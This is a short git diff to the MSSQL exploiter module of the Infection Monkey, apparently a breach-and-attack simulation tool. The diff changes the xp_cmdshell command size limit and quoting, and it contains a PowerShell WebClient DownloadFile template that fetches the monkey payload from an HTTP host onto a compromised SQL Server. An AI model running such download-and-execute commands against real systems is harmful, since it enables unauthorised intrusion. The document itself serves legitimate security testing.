diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index b519ee422..453e875ca 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -33,16 +33,16 @@ class MSSQLExploiter(HostExploiter): TMP_FILE_NAME = "tmp_monkey.bat" TMP_DIR_PATH = "%temp%\\tmp_monkey_dir" - MAX_XP_CMDSHELL_COMMAND_SIZE = 128 + MAX_XP_CMDSHELL_COMMAND_SIZE = 12800 - XP_CMDSHELL_COMMAND_START = 'xp_cmdshell "' - XP_CMDSHELL_COMMAND_END = '"' + XP_CMDSHELL_COMMAND_START = "xp_cmdshell '" + XP_CMDSHELL_COMMAND_END = "'" EXPLOIT_COMMAND_PREFIX = ">{payload_file_path}" CREATE_COMMAND_SUFFIX = ">{payload_file_path}" MONKEY_DOWNLOAD_COMMAND = ( "powershell (new-object System.Net.WebClient)." - "DownloadFile(^'{http_path}^' , ^'{dst_path}^')" + "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) def __init__(self):